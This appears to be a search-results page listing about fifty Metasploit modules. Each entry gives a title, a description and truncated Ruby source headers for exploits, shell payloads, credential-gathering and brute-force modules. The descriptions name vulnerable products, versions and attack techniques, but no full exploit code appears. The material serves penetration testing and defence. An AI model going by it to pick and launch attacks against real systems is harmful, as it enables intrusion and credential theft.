6847 matches found
MediaWiki SyntaxHighlight extension option injection vulnerability
This module exploits an option injection vulnerability in the SyntaxHighlight extension of MediaWiki. It tries to create & execute a PHP file in the document root. The USERNAME & PASSWORD options are only needed if the Wiki is configured as private. This vulnerability affects any MediaWiki...
Varnish Cache CLI Login Utility
This module attempts to login to the Varnish Cache varnishd CLI instance using a bruteforce list of passwords. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'metasploit/framework/credentialcollection' requir...
Android Meterpreter Shell, Reverse TCP Inline
Connect back to the attacker and spawn a Meterpreter shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = :dynamic include Msf::Payload::TransportConfig include Msf::Payload::Sing...
OpenNMS Java Object Unserialization Remote Code Execution
This module exploits a vulnerability in the OpenNMS Java object which allows an unauthenticated attacker to run arbitrary code against the system. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule...
Regsvr32.exe (.sct) Command Delivery Server
This module uses the Regsvr32.exe Application Whitelisting Bypass technique as a way to run a command on a target system. The major advantage of this technique is that you can execute a static command on the target system and dynamically and remotely change the command that will actually run by...
Android ADB Debug Server Remote Payload Execution
Writes and spawns a native payload on an android device that is listening for adb debug messages. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Android ADB Debug Server Remote Payload...
BusyBox Enumerate Connections
This module will be applied on a session connected to a BusyBox shell. It will enumerate the connections established with the router or device executing BusyBox. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
VMWare Update Manager 4 Directory Traversal
This modules exploits a directory traversal vulnerability in VMWare Update Manager on port 9084. Versions affected by this vulnerability: vCenter Update Manager 4.1 prior to Update 2, vCenter Update Manager 4 Update 4. This module requires Metasploit: https://metasploit.com/download Current sourc...
BSD x64 Command Shell, Reverse TCP Inline (IPv6)
Connect back to attacker and spawn a command shell over IPv6 This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 105 include Msf::Payload::Single include Msf::Payload::Bsd include...
Windows Gather Active Directory BitLocker Recovery
This module will enumerate BitLocker recovery passwords in the default AD directory. This module does require Domain Admin or other delegated privileges. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
BSD x64 Execute Command
Execute an arbitrary command This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Exec ---- Executes an arbitrary command. module MetasploitModule CachedSize = 31 include Msf::Payload::Single include Msf::Payload::Bsd def...
Belkin Play N750 login.cgi Buffer Overflow
This module exploits a remote buffer overflow vulnerability on Belkin Play N750 DB Wireless Dual-Band N+ Router N750 routers. The vulnerability exists in the handling of HTTP queries with long 'jump' parameters addressed to the /login.cgi URL, allowing remote unauthenticated attackers to execute...
Solarwinds Orion AccountManagement.asmx GetAccounts Admin Creation
This module exploits a stacked SQL injection in order to add an administrator user to the SolarWinds Orion database. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Solarwinds Orion...
PXE Boot Exploit Server
This module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that reads the hard drive; placing a payload to install metsvc, disable the firewall, and add a new user metasploit on any Windows partition seen, and add a uid...
MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection
This module exploits a universal cross-site scripting UXSS vulnerability found in Internet Explorer 10 and 11. By default, you will steal the cookie from TARGETURI which cannot have X-Frame-Options or it will fail. You can also have your own custom JavaScript by setting the CUSTOMJS option. Lastl...
WordPress Pixabay Images PHP Code Upload
This module exploits multiple vulnerabilities in the WordPress plugin Pixabay Images 2.3.6. The plugin does not check the host of a provided download URL which can be used to store and execute malicious PHP code on the system. This module requires Metasploit: https://metasploit.com/download Curre...
Reflective DLL Injection, Hidden Bind TCP Stager
Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 343...
VNC Server (Reflective Injection), Hidden Bind TCP Stager
Inject a VNC Dll via a reflective loader staged. Listen for a connection from a hidden port and spawn a command shell to the allowed host. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule...
Tincd Post-Authentication Remote TCP Stack Buffer Overflow
This module exploits a stack buffer overflow in Tinc's tincd service. After authentication, a specially crafted tcp packet default port 655 leads to a buffer overflow and allows to execute arbitrary code. This module has been tested with tinc-1.1pre6 on Windows XP custom calc payload and Windows ...
GNU Wget FTP Symlink Arbitrary Filesystem Access
This module exploits a vulnerability in Wget when used in recursive -r mode with a FTP server as a destination. A symlink is used to allow arbitrary writes to the target's filesystem. To specify content for the file, use the "file:/path" syntax for the TARGETDATA option. Tested successfully with...
HP Network Node Manager I PMD Buffer Overflow
This module exploits a stack buffer overflow in HP Network Node Manager I NNMi. The vulnerability exists in the pmd service, due to the insecure usage of functions like strcpy and strcat while handling stackoption packets with user controlled data. In order to bypass ASLR this module uses a...
Railo Remote File Include
This module exploits a remote file include vulnerability in Railo, tested against version 4.2.1. First, a call using a vulnerable line in thumbnail.cfm allows an attacker to download an arbitrary PNG file. By appending a .cfm, and taking advantage of a directory traversal, an attacker can append...
Advantech WebAccess DBVisitor.dll ChartThemeConfig SQL Injection
This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The vulnerability exists in the DBVisitor.dll component, and can be abused through malicious requests to the ChartThemeConfig web service. This module can be used to extract the site and project usernames and...
Windows Command Shell, Hidden Bind TCP Inline
Listen for a connection from certain IP and spawn a command shell. The shellcode will reply with a RST packet if the connections is not coming from the IP defined in AHOST. This way the port will appear as "closed" helping us to hide the shellcode. This module requires Metasploit:...
Adobe Flash Player Regular Expression Heap Overflow
This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.5.502.149. By supplying a specially crafted swf file with special regex value, it is possible to trigger a memory corruption, which results in remote code execution under the context of the user, a...
SerComm Device Configuration Dump
This module will dump the configuration of several SerComm devices. These devices typically include routers from NetGear and Linksys. This module was tested successfully against the NetGear DG834 series ADSL modem router. This module requires Metasploit: https://metasploit.com/download Current...
OSX Screen Capture
This module takes screenshots of target desktop and automatically downloads them. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'OSX Screen Capture', 'Description' = %q This module takes...
OSX VPN Manager
This module lists VPN connections and tries to connect to them using stored credentials. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'OSX VPN Manager', 'Description' = %q This module lists V...
Oracle Endeca Server Remote Command Execution
This module exploits a command injection vulnerability on the Oracle Endeca Server 7.4.0. The vulnerability exists on the createDataStore method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. In addition, t...
WordPress Brute Force and User Enumeration Utility
WordPress Authentication Brute Force and User Enumeration Utility This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress Brute Force and User Enumeration Utility', 'Description' = 'WordPress...
MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation
Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation. This issue affects Windows Vista, 7, 8, Server 2008, Server 2008...
Nagios Remote Plugin Executor Arbitrary Command Execution
The Nagios Remote Plugin Executor NRPE is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dontblamenrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NR...
SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Execution
This module makes use of the SXPGCALLSYSTEM Remote Function Call, through the use of the /sap/bc/soap/rfc SOAP service to execute OS commands as configured in the SM69 transaction. This module requires Metasploit: https://metasploit.com/download Current source:...
Avaya WinPMD UniteHostRouter Buffer Overflow
This module exploits a stack buffer overflow in Avaya WinPMD. The vulnerability exists in the UniteHostRouter service, due to the insecure usage of memcpy when parsing specially crafted "To:" headers. The module has been tested successfully on Avaya WinPMD 3.8.2 over Windows XP SP3 and Windows 20...
FlexNet License Server Manager lmgrd Buffer Overflow
This module exploits a vulnerability in the FlexNet License Server Manager. The vulnerability is due to the insecure usage of memcpy in the lmgrd service when handling network packets, which results in a stack buffer overflow. In order to improve reliability, this module will make lots of...
OS X Gather Colloquy Enumeration
This module will collect Colloquy's info plist file and chat logs from the victim's machine. There are three actions you may choose: INFO, CHATS, and ALL. Please note that the CHAT action may take a long time depending on the victim machine, therefore we suggest to set the regex 'PATTERN' option ...
Windows x64 LoadLibrary Path
Load an arbitrary x64 library path This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 285 include Msf::Payload::Windows include Msf::Payload::Single def initializeinfo =...
phpLDAPadmin query_engine Remote PHP Code Injection
This module exploits a vulnerability in the lib/functions.php for phpLDAPadmin versions 1.2.1.1 and earlier that allows attackers input parsed directly to the createfunction php function. A patch was issued that uses a whitelist regex expression to check the user supplied input before being parse...
Windows Gather Meebo Password Extractor
This module extracts login account password stored by Meebo Notifier, a desktop version of Meebo's Online Messenger. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Gather Meebo Passwor...
Windows Gather Enumerate Domain
This module identifies the primary Active Directory domain name and domain controller. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Gather Enumerate Domain', 'Description' = %q This...
Windows Gather Directory Permissions Enumeration
This module enumerates directories and lists the permissions set on found directories. Please note: if the PATH option isn't specified, then the module will start enumerate whatever is in the target machine's %PATH% variable. This module requires Metasploit: https://metasploit.com/download Curren...
SMB Scanner Check File/Directory Utility
This module is useful when checking an entire network of SMB hosts for the presence of a known file or directory. An example would be to scan all systems for the presence of antivirus or known malware outbreak. Typically you must set RPATH, SMBUser, SMBDomain and SMBPass to operate correctly. Thi...
Windows Manage Inject in Memory Multiple Payloads
This module will inject in to several processes a given payload and connecting to a given list of IP Addresses. The module works with a given lists of IP Addresses and process PIDs if no PID is given it will start a the given process in the advanced options and inject the selected payload in to t...
SAP Management Console Version Detection
This module simply attempts to identify the version of SAP through the SAP Management Console SOAP Interface. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'SAP Management Console Version...
SAP Management Console Extract Users
This module simply attempts to extract SAP users from the ABAP Syslog through the SAP Management Console SOAP Interface. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'SAP Management Console...
Windows Speech API - Say "You Got Pwned!"
Causes the target to say "You Got Pwned" via the Windows Speech API This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework =begin https://www.exploit-db.com/sploits/w32-speaking-shellcode.zip Copyright c 2009-2010 Berend-Jan...
DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow
This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 Build 6.1.8.10. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. This module requires Metasploit: https://metasploit.com/download Current source:...
BACnet OPC Client Buffer Overflow
This module exploits a stack buffer overflow in SCADA Engine BACnet OPC Client v1.0.24. When the BACnet OPC Client parses a specially crafted csv file, arbitrary code may be executed. This module requires Metasploit: https://metasploit.com/download Current source:...
Java Meterpreter, Java Bind TCP Stager
Run a meterpreter server in Java. Listen for a connection This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 5256 include Msf::Payload::Stager include Msf::Payload::Java include...
VxWorks WDB Agent Boot Parameter Scanner
Scan for exposed VxWorks wdbrpc daemons and dump the boot parameters from memory This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'VxWorks WDB Agent Boot Parameter Scanner', 'Description' = 'Scan...